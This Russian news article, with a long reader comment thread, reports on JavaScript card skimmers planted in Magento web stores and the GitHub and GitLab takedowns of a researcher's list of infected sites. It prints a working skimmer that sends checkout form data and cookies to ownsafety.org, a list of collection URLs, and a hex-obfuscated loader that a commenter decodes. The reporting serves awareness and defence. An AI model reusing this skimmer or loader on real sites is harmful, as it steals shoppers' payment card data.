Онлайн-скимминг — относительно новая форма мошенничества с банковскими картами. Суть понятна из названия. Если обычный скиммер представляет собой накладку на картоприёмник ATM, который делает дамп магнитной полосы, то онлайн-скиммер — это программная закладка на сервере интернет-магазина, которая пассивно перехватывает платёжные данные во время их ввода пользователем в текстовые поля в браузере. До настоящего времени кардеры концентрировались преимущественно на серверах транзакций, где применяется шифрование, но в этом случае информация снимается ещё до шифрования. Затем информация о платёжных картах продаётся на подпольных форумах: обычно по этим картам постороннее лицо может без проблем осуществить платежи.
Специалисты по безопасности из Nightly Secure говорят, что онлайн-скимминг быстро набирает популярность в последнее время. Впервые о распространении такого мошенничества заговорили в 2015 году. На ноябрь 2015 года из списка 255 000 интернет-магазинов был обнаружен 3501 магазин с JS-закладками на сервере. За год их количество выросло на 69%.
Образец javascript-закладки для перехвата платёжных данных выглядит так (в данном случае информация отправляется на
http://ownsafety.org/opp.php):<script>// <![CDATA[
// whitespace added for readability --wdg
function j(e) {
var t = "; " + document.cookie,
o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
}
j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
e("button").on("click", function() {
var t = "",
o = "post",
n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i), t += a + "=" + c[i].value + "&"
}
if (t) {
var l = new RegExp("[0-9]{13,16}"),
u = new XMLHttpRequest;
u.open(o, e("
<div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear()
}
}
})
});
// ]]></script>В прошлом году исследователи составили список наиболее часто используемых адресов для сбора данных:
1860 https://ownsafety.org/opp.php
390 http://ownsafety.org/opp.php
309 https://useagleslogistics.com/gates/jquery.php
100 https://redwiggler.org/wp-content/themes/jquerys.php
70 https://clickvisits.biz/xrc.php
28 https://gamula.eu/jquery.php
23 https://gamula.ru/order.php
22 https://news-daily.me/gt/
20 https://antaras.xyz/jquery.php
17 https://clicksale.xyz/xrc.php
10 https://ausfunken.com/service/css.php
9 http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php
5 https://redwiggler.org/wp-content/themes/jquery.php
1 /js/index.php
1 /js/am/extensions/sitemap_api.php
1 https://infopromo.biz/lib/jquery.php
1 https://google-adwords-website.biz/gates/jquery.php
1 https://bandagesplus.com/order.php
1 http://nearart.com/order.php
1 http://happysocks.in/jquery.plПрактически во всех случаях используются небольшие варианты одного и того же кода.
Подобную закладку довольно трудно обнаружить на сервере. Код загружается из CMS и работает в браузере. На упомянутых трёх с половиной тысячах сайтов в прошлом году она работала по несколько месяцев, на многих — полгода и больше.
Специалисты считают, что большое количество заражённых серверов указывает на высокую степень автоматизации атаки. Этим занимаются не какие-то скрипт-кидди, а хорошие профессионалы. Вероятно — из России.
Для внедрения закладок используются уязвимости в программном обеспечении интернет-магазинов. В первую очередь, это уязвимое программное обеспечение Magento Commerce. Именно через него проще всего внедрить код CMS, хотя на самом деле этот код может работать в любом интернет-магазине, не обязательно использующем Magento. Проверить интернет-магазин на наличие уязвимостей можно на сайте MageReports.com.
Хотя проблему подняли год назад, но за прошедший год она никуда не исчезла. Хуже того, заражённых интернет-магазинов стало в полтора раза больше. В марте 2016 года количество магазинов со скиммерами выросло с 3501 до 4476, а в сентябре 2016 года — до 5925.
Ребята из Nightly Secure опубликовали список всех заражённых магазинов, чтобы предупредить покупателей — и уведомить администраторов этих магазинов об уязвимости. Ведь среди них были довольно популярные сайты, в том числе отделения автопроизводителей (Audi ZA), правительственные организации (NRSC, Малайзия), сайты популярных музыкантов (Бьорк), и некоммерческие орагнизации (Science Museum, Washington Cathedral).
Если год назад практически во всех магазинах использовались небольшие модификации одного и того же онлайн-скиммера, то сейчас исследователи нашли уже 9 отдельных разновидностей скрипта, принадлежащих 3 разным семействам (образцы код на Github).
Злоумышленники поумнели и сейчас используют многоуровневую обфускацию кода, которую не так просто разобрать. Например, скрипт может маскироваться вот так:
Реальный код зловреда:
<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');//4079</script>Авторы также усовершенствовали механизм перехвата данных платёжных карточек. Если раньше зловред просто перехватывал страницы со строкой
checkout в URL, то теперь он уже распознаёт популярные платёжные плагины Firecheckout, Onestepcheckout и Paypal.Специалисты из Nightly Secure попыталсь связаться с рядом магазинов (около 30) и сообщить им об установленном скиммере, но от большинства магазинов не получили ответа, а другие проявили удивительную беспечность. Один сказал, что это не его проблема, потому что платежи обрабатывает сторонняя компания. Второй сказал, что это просто ошибка Javascript, не представляющая угрозы. Третий вовсе сказал, что никакой опасности не может быть, потому что «магазин работает по HTTPS». Автор передал список магазинов со скиммерами в Google для помещения в чёрный список Chrome Safe Browsing.
Список всех магазинов со скиммерами был первоначально опубликован на Github. И вот тут началось самое интересное. Вскоре Github без предупреждения удалил со своего сайта публикацию результатов исследования онлайн-магазинов.
Судя по всему, Github осуществил цензуру по стандартной процедуре, получив DMCA-запрос от одного из магазинов. Конечно, магазину неприятно, когда у него находят уязвимость и рассказывают всему миру.
Вчера автор переместил результаты исследования безопасности интернет-магазинов на хостинг Gitlab. Сегодня страница по этому адресу возвращает ошибку 404. Несколько часов назад автор получил письмо от Gitlab, в котором объясняют причины удаления. По мнению администрации, публикация списка уязвимых магазинов рассматривается как «вопиющий случай», который не может быть разрешён. Поэтому список был удалён (UPD: доступ восстановлен, директор Gitlab принёс извинения).
Копия списка в веб-архиве
Копия на Pastebin
Заметим, что в списке магазинов с установленными онлайн-скиммерами перечислены 44 домена в зоне .RU.
Будем надеяться, что администраторы этих магазинов оперативно установят версию Magento с последними патчами и компенсируют убытки покупателям, у которых копии платёжных карточек утекли на чёрный рынок.
Комментарии (86)
Pravo
15.10.2016 12:31+1>> Подобную закладку довольно трудно обнаружить на сервере.
нет, вовсе не трудно:
<реклама>
https://publicwww.com/websites/%22querySelectorAll%28%5C%22input%2C+select%2C+textarea%2C+checkbox%22/
https://publicwww.com/js/%22querySelectorAll%28%5C%22input%2C+select%2C+textarea%2C+checkbox%22/
</реклама>
и да, код мутирует, домены для отстука тоже.
Celtis
15.10.2016 12:44Автор передал список магазинов со скиммерами в Google для помещения в чёрный список Chrome Safe Browsing.
Сайты все еще доступны.
MaxAlekseev
15.10.2016 12:55+32>>Этим занимаются не какие-то скрипт-кидди, а хорошие профессионалы. Вероятно — из России.
Это какой то новомодный тренд захвативший медиапространство, если где то, кого то хакнули обязательно укажи на след из России, разумеется без доказательств.
andrewenka
15.10.2016 20:35+4Помоему отличный тренд.
Вот представьте, какая-нибудь крупная зарубежная IT-компания планирует нанять разработчиков на новый проект, в котором надо большое внимание уделить безопасности. Соответственно, с хорошей оплатой. Вот они и думают:
— А где нам найти таких хороших разрабов?
— Как где, в России, там же полно хакеров.
Так пассивно поднимается ваша конкурентноспособность.
:)Pakos
17.10.2016 10:40+1Лишь бы без дополнений в виде отношения как к бывшим/действующим преступникам.
DocJester
17.10.2016 12:12+3Почему же сразу поднимается?
Что им мешает размышлять иным образом, к примеру:
— Хм, к нам пытается устроиться разраб из России на проект с безопасностью, возьмем?
— Ты что, там в России уйма хакеров, еще потом сам на нас атаку и организует.
Pravo
15.10.2016 22:13+2Автор исследования ездит на УАЗ 3741, так что, возможно, пассаж про Россию это некий <сарказм>
Findeh
15.10.2016 13:03Учитывая описанную в статье первоначальную реакцию магазинов на уязвимость, удивительно что кто-то из них вобще мог обратиться к Github с требованием удалить список.
JC_Piligrim
15.10.2016 14:17+3А если предположить, что магазины не торопятся реагировать, потому что сами в сговоре? Может у хакеров своеобразная партнерка работает? «Поставь скрипт в магазин и получи 30% наворованного — обутый пользователь все равно ничего не поймет и не докажет». Вроде той схемы, что работает между «поставщиками платного контента» и опсосами.
Rampages
15.10.2016 15:42-3В списке 44 домена в зоне .ru
Есть какие-нибудь интересные домены в списке риска?
Можно просто номера строки из pastebin в целях конспирации ;)
MyFearGear
15.10.2016 18:04+1grep '.*.ru'
Rampages
16.10.2016 07:26+1Смысл был не в поиске, а в интересности доменов.
Уже сделал поиск, иначе бы как я посчитал кол-во доменов в зоне .ru?
Интересует не только зона .ru, а может быть есть среди них какие-то крупные западные интернет магазины…
Pakos
17.10.2016 10:41Некоторые российские могут быть с ком-доменом, но ничего знакомого с .ru не увидел.
sumanai
15.10.2016 15:48> Заметим, что в списке магазинов с установленными онлайн-скиммерами перечислены 44 домена в зоне .RU.
Домены с кириллицей забыли, их там ещё +10 штук.
Myrddin
15.10.2016 16:59+2Может представители GitLab прокомментируют ситуацию?
DarkByte
15.10.2016 19:08Атака типа «внедрение кода CMS», что это? «Реальный код зловреда» по прежнему обфусцирован, неужели это не очевидно даже для редактора GT? И это ладно ещё сайты взламывают, владельцу сайта ещё как то можно защититься, а ведь ещё бывает что в популярных расширениях для браузера встраивают подобный код, и он добавляется на все сайты, которые заинтересуют злоумышленников.
boingo-00
15.10.2016 19:26Прочел в заголовке «скример» и очень удивился, пока не перечитал
— Сейчас посмотрел сайты с доменом .ru — более сотни уже
Быстро пробежался поиском по списку — подделок известных магазинов и площадок не нашел
progreccor
15.10.2016 20:35+1я вот одного не понял — как можно перехватывать данные кредиток, если например paypal перебрасывает на другой сайт для оплаты?
rPman
15.10.2016 22:21Мало того, чтобы тебе на домене разрешили пользоваться визой или мастеркард необходимо пройти нехилую сертификацию набезопасность в т.ч.
В большинстве случаев если сайт хочет подключить платежи — он идет к платежным системам у которых уже есть необходимые сертификаты или к конкретному банку, и тот дает свой готовый редирект на свою страничку (правда некоторые делают iframe, 'поубивавбы')
единственный метод скримера — это 'проксирование' запросов к банку на вебсервере (была недавно статья с примером такой атаки)
stepik777
15.10.2016 23:03Все магазины, у которых нет сертификата PCI DSS, должны редиректить куда-то (или открывать страницу в iframe). Чтобы перехватить данные, злоумышленникам нужно делать фэйковые страницы оплаты, то есть редиректить не на paypal, а на фишинговый сайт.
dobergroup
15.10.2016 20:35В списке есть сайты, на которых отсутствует функционал оплаты картой. Я бы предположил, что это профилактические меры, но как минимум у двух таких сайтов нужного функционала никогда не было. Выходит, ложно-положительные срабатывания?
svatoy
16.10.2016 13:36Специалисты считают, что большое количество заражённых серверов указывает на высокую степень автоматизации атаки.
Для внедрения закладок используются уязвимости в программном обеспечении интернет-магазинов. В первую очередь, это уязвимое программное обеспечение Magento Commerce.
Таски на понедельник:
- Получить (найти, купить, нагуглить) уязвимость популярных CMS (Magento Commerce например)
- Обкатать на локалке скрипт эксплуатации уязвимости с последующим внедрением скиммера
- Добавить список сайтов на популярных CMS, отправить рабов со скриптом.
- ...
- Profit
В списке зараженные сайты, а не магазины
Vilgelm
16.10.2016 16:23В списке вообще есть демка какой-то модификации Magento. Очевидно, что код встраивается автоматически через какую-то уязвимость или через спираченные плагины\шаблоны (ныне популярная тема впихивать в них всякую хрень, а потом распространять через варезники).
mkth
15.10.2016 22:20-1Это стандартная практика, особенно для России. Я имею ввиду, тупость просто космического уровня. Потому жулики и живут припеваюче
old_bear
15.10.2016 22:40+2>>Специалисты считают, что большое количество заражённых серверов указывает на высокую степень автоматизации атаки. Этим занимаются не какие-то скрипт-кидди, а хорошие профессионалы. Вероятно — из России.
«У пальто плохой фасон — значит шил его масон.» (с)
В смысле, что немного умиляет смотреть, как столь простая манипуляция общественным мнением неизменно находит отклик у просвещённой общественности. Всего-то и надо — в течении довольно непродолжительного времени последовательно употреблять заветную фразу «наверное, это были хакеры из России» применительно ко всем комментируемым инцидентам в области компьютерной безопасности (причём какие-либо доказательства совершенно не обязательны), чтобы эта присказка стала дежурной и автоматически вставлялась в статьи множеством независимых авторов (опять же, без каких-либо доказательств).
И вот, profit — миллионы читателей живут со вбитым в мозги клише про всеобщую вину «хакеров из России». Понятное дело, что эти хакеры все сплошь в ushanka, а в свободное время пьют vodka и смотрят как их домашний медведь пляшет под balalayka.vsapronov
16.10.2016 02:33Выдыхайте!
Поверьте, в IT-сообществе за бугром репутация выходцев из России и СССР непоколебима — нас все еще нанимают за бешеные бабки. Такие истории только демонстрируют думающим людям дырявую, убогую, воображаемую кибербезопасность и сильную подготовку технических специалистов в России.
Сплотить нацию вокруг воображаемого киберпротивника не так просто как полететь бомбить воображаемое хим. оружие по всему миру…
Так что политически внушение туфты про российских хакеров — это превознесение России…
ChALkeRx
15.10.2016 23:50+2Вчера автор переместил результаты исследования безопасности интернет-магазинов на хостинг Gitlab. Сегодня страница по этому адресу возвращает ошибку 404. Несколько часов назад автор получил письмо от Gitlab, в котором объясняют причины удаления. По мнению администрации, публикация списка уязвимых магазинов рассматривается как «вопиющий случай», который не может быть разрешён. Поэтому список был удалён.
Восстановили уже: https://about.gitlab.com/2016/10/15/gitlab-reinstates-list-of-servers-that-have-malware/
But in this case the victim of the vulnerability is not only the owner but also the users of the web store. The owners of web stores have a responsibility to their users. And it is in the users interest to have the list published so owners fix their stores. We currently think that the interest of the user weights heavier. Therefore we reinstated the snippet.
Изначально решили, что публикация списка дырявых сайтов — не круто, потом подумали хорошенько, и решили что потенциальный вред пользователям от уже заражённых сайтов перевешивает вред от публикации списка дырявых сайтов.
Zibx
16.10.2016 03:08+2Реальный код зловреда слишком зловещь! На самом деле за ним скрывается вот это:
window.document.write("<script type="text/javascript" src="http://ip.5uu8.com/ip/ip_4079.js"></script>")
Quiensabe
16.10.2016 04:28+2IMHO — вся эта борьба со скримерами, это сражение с ветряными мельницами. Пока будут способы увести деньги с карточки — будут уводить, а «в дураках» — всегда окажутся покупатели.
Нужно чтобы карточка «намертво» привязывалась к номеру телефона, и никаких способов снять деньги без подтверждения через смс — не было в принципе. А то сейчас если клиент сам платит — у него каждый раз код запросят. А как данные украдут — вдруг оказывается, что можно и без кода как-то снять. Вот этого я никак не пойму. Если кому-то нужно без кода — сделайте галочку в договоре (по умолчанию выключенную), о том что клиент берет на себя всю ответственность, но хочет то-то и то-то…
Проблема в том, что банкам и мобильным операторам которые допускают возможность кражи — по большому счету плевать на ситуацию, ведь добивается возврата далеко не каждый. Если бы обязали банки возвращать сворованное в 10 кратном размере (если списание произошло без реального подтверждения по смс или присутствия пользователя, например, на кассе). И если бы причины кражи с мобильным оператором выяснял банк, а не пользователь — уверен, что резко нашлись бы решения кардинально улучшить ситуацию.sumanai
16.10.2016 12:10+2> Нужно чтобы карточка «намертво» привязывалась к номеру телефона, и никаких способов снять деньги без подтверждения через смс — не было в принципе.
Телефон столь ненадёжная вещь, на котором живут вирусы, СИМ которого перевыпускается в любом офисе оператора безо всяких документов- спасибо, не нужно.
> Если бы обязали банки возвращать сворованное в 10 кратном размере
Суть в том, что в списании участвуют несколько участников. И если сейчас обрезать переводы без 3D Secure, отвалятся такие сервисы, как амазон. А кому нужна карточка для оплаты в интернете без амазона?Quiensabe
17.10.2016 04:01+1Телефон столь ненадёжная вещь, на котором живут вирусы, СИМ которого перевыпускается в любом офисе оператора безо всяких документов- спасибо, не нужно.
Суть моего замечания как раз в том что такая ситуация сохраняется ровно пока всем кто может на нее повлиять — плевать. Были бы от краж большие проблемы у банков и мобильных операторов — и ситуации с «СИМ перевыпускается в любом офисе оператора безо всяких документов» — внезапно пропали бы.
Навскидку могу предложить несколько решений которые сильно сократят такие ситуации, но которые не вводят из экономии средств.
К слову, когда хотел перевыпустить свою симку, без документов меня даже слушать не стали.
На счет вирусов — утверждения безосновательны. На современном смартфоне чтобы словить вирус который сможет читать/отправлять смс — нужно очень постараться. Были тут статьи на эту тему.
А кому нужна карточка для оплаты в интернете без амазона?
1. Мне нужна. В инете покупал многое, но конкретно на амазоне — ни разу.
2. Кому сильно нужно — можно написать в банке заявление, или для амазона можно завести yandex-карту и кидать на нее ровно те суммы которые нужны.
Деньги обычно уводят с зарплатных карт, а на них защита 3D Secure, активированная по умолчанию — была бы очень кстати. Люди чаще всего даже не догадываются, что с их карты можно снять деньги без ввода кода, потому, что сами вводили его при каждом платеже.
3. Уверен, что амазон бы решил проблему и добавил поддержку 3D Secure. Также как и другие поставщики. Было бы желание.
JTG
17.10.2016 17:133dsecure и есть «галочка», только находится она у мерчанта (магазина то бишь): мерчант включил 3dsecure — усложнил себе процесс оплаты и потерял часть клиентов, которые смс не дождались/находятся в другой стране/роуминге etc. Выключил 3dsecure — получил больше клиентов, но готовься возвращать деньги по мошенническим транзакциям. Видимо у амазона дополнительный доход с лихвой покрывает расходы на фрод. А деньги по транзакциям без 3dsecure банк возвращают в 100% случаев, правда процесс это длительный.
frol_aleksan
20.10.2016 09:33Вирусы на телефоне? Сам себе злобный буратино. Не качай всякую хрень абы откуда. Купи нокию-фонарик без явы и держи в ящике стола, только совершать любые платные операции с него не забывай — звонок или смска раз в месяц самое то. А то купят симку, привяжут карту и забывают, а потом по условиям пункта договора о неиспользовании номера в течение 3 месяцев его отбирают и подключают кому-то другому с «подарком» в виде привязанной твоей банковской карты.
Замена симки без паспорта — ответственность на девочках, сидящих в офисе опсоса. По правилам они должны требовать паспорт или доверенность установленного образца от владельца номера. Не раз менял симки (маме красно-яйцевую по случаю утопления телефона, себе старую на новую от зеленого с поддержкой 4G) — везде требовали паспорт.sumanai
21.10.2016 16:53> Вирусы на телефоне? Сам себе злобный буратино.
Смартфоны на андроиде паршиво обновляются, так что не каждый троян- вина пользователя.
> Замена симки без паспорта — ответственность на девочках, сидящих в офисе опсоса.
Только вот сколько меняли и снимали- никого так и не привлекли.
> Не раз менял симки (маме красно-яйцевую по случаю утопления телефона, себе старую на новую от зеленого с поддержкой 4G) — везде требовали паспорт.
Ясен пень, вы же не в сговоре с работниками ОпСоСа.
harbor1
16.10.2016 13:58вообще, как бы нет проблемы запрещать интернет покупки в интернет-банкинге.
например газпромбанка и тинькова это возможно(не рекламирую, просто другими не пользовался)
У ГПБ в их приложении можно даже выставить в каких странах можно делать интернет покупки,, а в каких нет. Но я обычно просто запрещаю все, так как карточка уже много где засветилась.
Vilgelm
16.10.2016 16:28+1> подтверждения через смс
Это абсолютно бесполезная и небезопасная фигня, перевыпустить симку легко и на смартфон тоже может попасть вирус. Да еще и можно на 3 мес улететь в отпуск и оператор дропнет контракт, а номер уйдет в продажу заново. Следующий обладатель номера может быть приятно удивлен бонусом в виде денег на счете.
Что действительно нужно, так это подтверждение платежа через приложение (как ENUM у Webmoney). Правда груз в виде обратной совместимости с мерчантами, которые не поддерживают 3d secure всю идею убивает на корню.
Pakos
17.10.2016 10:50>> Нужно чтобы карточка «намертво» привязывалась к номеру телефона
нужно идти дальше — чтобы номер телефона намертво привязвался к телефону (затрояненому вхлам), а то доставать эти «безопасные» СМС сложновато
porutchik
16.10.2016 05:41+1Что-то не пойму, как зловредный js на domain.ru может украсть данные карточки, которые вводятся в платёжном шлюзе (money.yandex.ru, payonline, robokassa и др.). Магазинов, которые «внутри» своей cms предлагали бы ввести данные карты, я не встречал. Максимум — стоит iframe от того же агрегатора, в который js попасть не может.
BubaHamona
16.10.2016 13:59Зона RU сравнительно молода, потому в большинстве российским магазинов все так. Но я многократно помогал небольшим интернет-магазинам из США и Европы править мелкие баги на сайте или внедрять что-то новенькое и был поражен обилием древнего кода, статичных страниц и применения технологий десятилетней давности.
Тут несколько вариантов:
1. Сайт действительно разрабатывался более 10 лет назад, когда платежных шлюзов было меньшинство, эквайринг предоставлялся местным банком, а о технологии 3D secure еще не слышали. Владелец такого магазина предпочитает НИЧЕГО не трогать, пока оно работает, а проблемы решать симптоматично.
2. Сайт разрабатывался «по учебнику», при чем, очень старому. На полном серьезе, есть такие энтузиасты. Недавно меня просили помочь исправить ошибку на сайте. На вопрос, почему все так странно написано получил ответ, что это прямая перепечатка из учебника (древний бумажный o'relly).
3. Владельцы сайтов могут не доверять «всем этим шлюзам и пейпалам», а предпочитают локальный эквайринг. Деньги поступают быстрее и нет лишних «заморозок» или необъяснимых отзывов. Кто работал с приемом платежей, знают, какой процент закладывается на фрод.PerlPower
16.10.2016 15:52какой процент закладывается на фрод.
Какой, если не секрет?BubaHamona
16.10.2016 17:19+1Зависит от типа товара. Колеблется от 5 до 30% при отключенном 3DS. Для цифровых товаров с простой схемой перепродажи (фотостоки, биржи тем для сайтов и т.д.) может достигать 90%. Диспуты стоят денег и очень редко заканчиваются в пользу продавца (не забываем про взнос за создание диспута), поэтому чаще всего платеж полностью рефандится.
При включенном 3DS проблема частично остается, так как до сих пор многие банки покупателей не считают его обязательным и по каким-то своим критериям подтверждают транзакцию без подтверждения. У других коды для 3DS предгенерированные или генерируются по простому принципу, а то и вообще просто пароль — такие перехватываются теми же JS-скиммерами или троянами вместе с данными карты.
Но такие дела (включен 3DS, подтверждение от банка покупателя) продавцу гораздо проще «выиграть», особенно если доказать, что отмена со стороны продавца технически невозможна или повлечет существенные потери.
Включать или не включать 3DS зависит от вас. Для сервисов, ориентированных на туристов, например, обязательное включение 3DS может отсечь часть покупателей, которым в данный момент недоступен «домашний» номер телефона, или служба безопасности банка которых страдает паранойей, отягощенной слабоумием.
Так что если у вас локальный бизнес с лагом исполнения (вроде доставки цветов или бетонные гробы на заказ), или long-time услуга (онлайн-курсы с сопровождением или подписка на трансляции — фактические затраты близки нулю, а отмена возможна в любой момент), то для вас возможно проще и дешевле воспользоваться эквайрингом местного банка, при этом не усложняя процесс покупки.
tendium
16.10.2016 12:05Подозреваю, что некоторые магазины не ответили, потому что с той стороны просто не говорят по-английски. Отписался по-чешски одному чешскому сайту, который достаточно популярен по сравнению с остальными чешскими сайтами в списке. Но тут есть такой момент, что люди склонны с подозрением относиться к подобным сообщениям.
Areso
16.10.2016 13:05А гугл переводчик у них уже отключили за неуплату?
tendium
16.10.2016 14:19Увы, особенность восприятия информации у многих людей такова, что если что-то на непонятном языке, то удалить не читая.
sweetbrick
16.10.2016 15:55Когда владельцы сайта будут по чисто формальному признаку получать обвинение в соучастии — удалить не получица)
Alexeyslav
17.10.2016 11:47И придется сидеть с преводчиком и читать китайский спам вместо того чтобы работать…
Holmax
17.10.2016 12:12Если вам от неизвестного отправителя придет письмо на языке, который вы не знаете, вы полезете в гугл, чтобы его перевести?
Areso
17.10.2016 16:51Так скажем, я немного занимался вебом, и моим клиентам регулярно приходят письма на английском, бывают письма и на других языках. Так вот, письма на английском они читают почти всегда (с помощью гугл или промт переводчиков), за исключением тех людей, которые принципиально удаляют все входящие не от контактов как спам (независимо от языка письма). Потому что так уж получилось исторически, что домены, хостинги, CMS-ки, вот это все разрабатывается и оперируется, очень часто, на английском языке. Вплоть до takedown нотисов и уведомлений от поисковых систем, что опаньки, у вас тут малварь завелся. Английский язык — язык Интернет сети.
RDEshka
16.10.2016 13:38Не знаю как в других банках — в моем, при оплате чего либо через интернет, надо вводить код, который приходит на мобилу.
Данные украдут, только воспользоваться не смогут.sumanai
16.10.2016 13:43+2Это называется 3D Secure, и это должно поддерживаться обоими сторонами. То есть при оплате в некоторых магазинах никакого кода требовать не будут, и ваши деньги спокойно улетят мошенникам. Ну и симки перевыпускаются на раз.
Welran
16.10.2016 19:34Проблема в том что совершив транзакцию украв у вас код (от банально ударив камнем по затылку и забрав телефон, до перевыпуска вашей симки и вирусов перехватывающих смс и подтверждающих код) вы уже не сможете вернуть деньги, не поймав преступника (что крайне маловероятно), так как ответственность лежит на вас. А банк просто поведёт плечами и скажет: «Ну не надо было подтверждать транзакцию, как бы мы не хотели, но ничем вам помочь не можем.»
arhangel0
20.10.2016 10:33Вы очень удивитесь когда купите что-либо на алиэкспрессе.
Alexeyslav
20.10.2016 10:42Странно, но у меня при оплате на алиэкспрессе требует код подтверждения.
frol_aleksan
20.10.2016 11:08С меня тоже не требовало, как, предполагаю, и с оратора выше.
Alexeyslav
20.10.2016 11:45Могут быть ньюансы, например суммы ниже установленного лимита проводятся без подтверждения, типа для оплаты проезда в транспорте будет не очень удобно каждый раз ждать и вводить код подтверждения.
Это зависит от банка-эмитента карты.frol_aleksan
20.10.2016 13:13Думается мне, что ~2200 (столько стоил заказ с алика) — это явно больше, чем установленный лимит, даже если он и есть. В то же время, когда оплачивал через робокассу чуть меньше 1000 рублей — там подтверждение требовало.
Кстати еще забавная фигня: у меня зарплатная виза, у мамы мастер. Банк один и тот же. Когда покупали в днсе, с меня пин требовали, а с мамы — нет.
sweetbrick
16.10.2016 15:48Да официальная и теневая торговля личными данными становится походу перспективным источником дохода веб проектов любого масштаба.
И уже никого не чешет правомерно или криминальным путем получены данные.
Под вопросом только кто выступает инициатором и организатором внедрения и использования уязвимых и опасных решений — веб-разработчики или кардеры.
Ну тот же самый MEGA — запускает на ваше машине в worker'e чо им вздумается, и что там они исполняют — вам не доложат.
Чо далеко ходить? Мой FF с далеко не самыми жесткими и полными параноидальными настройками не логинится на сраном гавносайте.
Мое мнение — все, даже не так, ВСЕ новые внедряемые и разрабатываемые коммерческие веб технологии изначально ориентированы на получение ваших любыхи всяких данных/сведений и ослабление того что называется информ. безопасности и приватности.
alexhott
17.10.2016 08:58Приходилось разок реализовать интернет эквайринг,
мой сервер готовил данные и дальше редирект на сайт банка.
Данные карты вводятся только на сайте банка.
В таком варианте либо ломать сайт банка, либо редирект на левый сайт.
Но встречаются сайты где своя форма ввода данных карточки, либо она в отдельном фрейме.
Оплат на таких сайтах стараюсь вообще избегать либо использовать одноразовую виртуальную карту.
Кстати из фрейма тоже можно инфу выудить ява скриптами, это ограничение вводит браузер и каждый браузер по разному работает.
MasMaX
17.10.2016 11:13Популярных магазинов нет. В списке не нашел ни одного которым пользовался. Кто-нибудь пользовался хоть одним магазином?
shatsa
17.10.2016 12:12решил пройтись по списку и предложить владельцам сайта почистить сайты от вирусов, поставить последние патчи и защитить сайт, чтоб такого не повторилось. разослал примерно 50 писем. пока ответил только один. его реакция была следующая:
«приходи ко мне !@#!@#, я тебя с лестницы скину !»№!"№, заразил и теперь вымогаешь деньги."
amarao
17.10.2016 14:36Request Policy.
Я не хочу отправлять странные запросы запросы на странные сервера и мой браузер меня слушается.
TigerClaw
19.10.2016 19:21Желтая же статья. За рубежом стараюсь платить через Paypal, в России ввод данных на стороне банка или платежной системы, как правило. Думаю масштаб реальной угрозы не такой и большой, а вот заражено большое количество уязвимых версий CMS даже если в них нечего воровать или нельзя украсть.
AlexanderS
А я вот удаление рассматриваю как вопиющий случай)
herr_kaizer
Иски за утерянную репутацию будет гитхаб ловить, а не ноунейм-юзеры. Реакция гитхаба понятна.
AlexanderS
Да это-то понятно. Просто, в мире как-то оригинальная ситуация складывается — конторы начинают чесаться только после того как косяк получит огласку. Складывается ощущение, что сообщать косяк напрямую администрации подавляющего большинства фирм даже смысла не имеет — столько уже случаев было, когда проходили месяцы и ничего не изменялось. А потом вдруг оказывается «утерянная репутация».
А список этот можно опубликовать в соцсети, он потом растащится по ней, а затем по инету — и поди лови его везде… Лучше бы убрали косяки, заткнули дыры и отписались бы, что, мол, была проблема, признаём, работы проведены, спасибо сообществу большое… Репутацию надо восстанавливать, а не стараться сразу информацию убрать везде, где руки дотянутся — вообще везде не дотянутся)
vsapronov
Ну так может быть репутация будет утеряна не просто так?! И может быть гитхаб как раз в правильной позиции, чтобы пойти в суд по таким искам, сделать их максимально публичными и изменить законы или практику таким образом, чтобы за утрату репутации по делу никому ничего не грозило? Гитхаб стал таким известным не просто так — его программисты таким сделали и могут расстроиться…
herr_kaizer
Гитхаб — не правозащитная организация, а отражать коллективный иск — очень долго и дорого. Кто это оплачивать будет? Вы?
vsapronov
Да, да, я забыл — они должны только продолжать доить своих Enterprise-пописчиков за счет того, что их армия альтруистов-программистов обеспечивает их популярность.
Вот у гитлабовцев нашлись стальные шары. Может гитхабу тоже поискать по ящикам?
andrrrrr
лично для меня репутация гигабайт уже утеряна. так как получается что они на стороне мошенников.
и в заголовке статьи можно прямо так и писать, «Github на стороне мошенников» или
«Github помогает мошенникам с банковскими картами, скрывает информацию о интернет-магазинах с установленными JS-скиммерами»
servermen
Да! Гитхаб же им вирусов на сайты по насовал!
brzsmg
Я понимаю если бы опубликовали сайты в которых есть уязвимость, знание которой может навредить.
Но, опубликован список сайтов, которыми надо прекратить пользоваться, ввиду ошибки из за которой сам пользователь и пострадает.
И о какой репутации идет речь, когда на лицо финансовая безопасность?
Это все равно, что не говорить людям о пожаре внутри магазина, а то потом придется за репутацию магазина отвечать, пусть лучше люди горят?